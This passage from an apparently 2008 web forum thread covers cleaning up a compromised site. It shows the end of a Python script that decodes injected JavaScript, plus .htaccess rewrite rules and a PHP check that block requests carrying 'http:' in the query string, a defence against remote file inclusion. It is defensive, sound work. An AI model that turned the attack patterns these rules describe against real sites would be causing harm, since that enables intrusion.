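    report = analyze_js(SAMPLE_JS)
    for p in report["payloads"]:
        print("decoded:", p)
    print("loads:", report["sources"])
    print("markers:", report["markers"])
```

Run `analyze_js()` over each .js file in the site; a non-empty "sources" list tells you which file to remove next, and the markers give a fixed string to grep for across the whole tree, since the same two digests bracket the .htaccess insert in Nash's first post.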

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Fri Mar 07, 2008 5:34 pm

Wow -- since posting this original thread, I have found a ton of other people recently experiencing the same problem.

This page has some good info: [link]

[link]


He suggests putting this in htaccess:
Code:

RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /------------http----------- [F,NC]
RewriteRule http: /---------http----------- [F,NC]


or adding this to all php files
Code:
<?php
Header("X-Powered-by: safe_http");   // hide the PHP version
if (preg_match("/http:/i", urldecode(getenv("REQUEST_URI") . getenv("QUERY_STRING")))) {
    Header("HTTP/1.1 503 Service Unavailable");
    exit;
}

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Fri Mar 07, 2008 6:01 pm